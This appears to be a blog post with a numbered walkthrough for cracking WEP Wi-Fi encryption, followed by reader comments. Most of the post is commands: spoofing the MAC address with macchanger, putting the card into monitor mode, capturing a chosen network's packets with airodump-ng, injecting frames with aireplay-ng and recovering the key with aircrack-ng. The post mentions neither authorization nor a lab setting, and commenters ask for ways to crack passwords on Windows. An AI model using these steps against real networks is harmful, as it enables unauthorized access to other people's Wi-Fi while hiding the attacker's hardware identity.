Cracking WEP encryption
Step 1:
View the Status of your WiFi adapter and change the original mac address
Open a new terminal and type following commands:
ifconfig
ifconfig wlan0 down
macchanger -r wlan0
ifconfig wlan0 up
Step 2:
Start the monitoring mode by typing following command:
airmon-ng start wlan0
Step 3:
Dump all the wifi networks available by using following command:
airodump-ng mon0
Step 4:
Now dump(capture) the packets of a particular ESSID(wifi name)
airodump-ng -c <channel no.> -w <filename> --bssid <BSSID> <interface>
Step 5:
Aireplay-ng is used to inject frames. Now type following command in a new terminal:
aireplay-ng -1 3 -a <BSSID> -e <ESSID> <interface>
Step 6:
Wait for the #Data count reach at least 10000 then press (ctrl+c)
Step 7:
Now lets crack the captured file:
Open a new terminal and type the following command:
aircrack-ng -b <BSSID> filename-01.cap
Sir u Told some of the software plzz tell there name too
ReplyDeleteplease mention what type of softwares u want...
DeleteSir,Is there any way to crack wifi password using windows
ReplyDeleteYou cannot crack the WiFi password through windows or mac .. because mac doesn't provide you those credentials and Windows is not having such power to hack the WiFi password the way you can is only through your Linux terminal .
Deletesir give some software for reverse engineering
ReplyDeleteU can download OLLY DBG or Immunity Debugger Or IDA Pro
Deletehaving problem in 5th step ,saying no such command is there
ReplyDelete